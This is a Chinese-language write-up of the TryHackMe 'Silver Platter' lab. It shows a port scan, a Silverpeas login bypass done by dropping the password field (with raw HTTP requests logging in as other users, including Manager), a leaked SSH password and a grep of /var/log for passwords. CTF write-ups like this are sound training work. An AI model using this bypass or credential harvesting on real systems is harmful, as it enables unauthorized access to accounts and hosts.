TryHackMe-Silver Platter

1
nmap -sCV -T4 --min-rate=1000 -O -oN scan bricks.thm

发现80和8080端口image-20250423193309448

8080端口扫描发现跳转

image-20250423193707700

80端口concat路由发现scr1ptkiddy

image-20250423193025818

结合题目名称,在网上搜到一个cms,

参考这个链接进行身份验证绕过,因为我们已经有一个用户名了,所以我们可以尝试无密码登陆

https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d

删除密码字段后成功登陆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET /silverpeas/look/jsp/MainFrame.jsp HTTP/1.1
Host: 10.10.30.137:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Origin: http://10.10.30.137:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.30.137:8080/silverpeas/defaultLogin.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=MN15-Arz65wRi7uDwpSHGRL_9vLhkX8EW-_FQy5G.ebabc79c6d2a
Connection: close


image-20250423194748581

后面发包后会进入

image-20250423195438120

然后发现会有其他用户我们利用前面的方式重复如此

登录到了Manager

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: 10.10.30.137:8080
Content-Length: 80
Cache-Control: max-age=0
Origin: http://10.10.30.137:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.30.137:8080/silverpeas/defaultLogin.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=hed0KKhg3UMCBSuHov93Gzso9XCrhHfKJGM7TiNy.ebabc79c6d2a; Silverpeas_Directory_Help=IKnowIt
Connection: close

Login=Manager&DomainId=0&X-STKN=MTE3MzQ2YWEtMzNhZC00MGU3LWIzZDMtOGJkYTE5YTI2N2Q2

拿到ssh连接密码

image-20250423200558996

cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

ssh连上去

第一个flag

image-20250423200726103

发现home目录下有一个tyler用户,尝试切换发现去找

image-20250423201020030

1
grep -Ri 'password' /var/log 2>/dev/null

image-20250423200944482

_Zd_zx7N823/

image-20250423201308502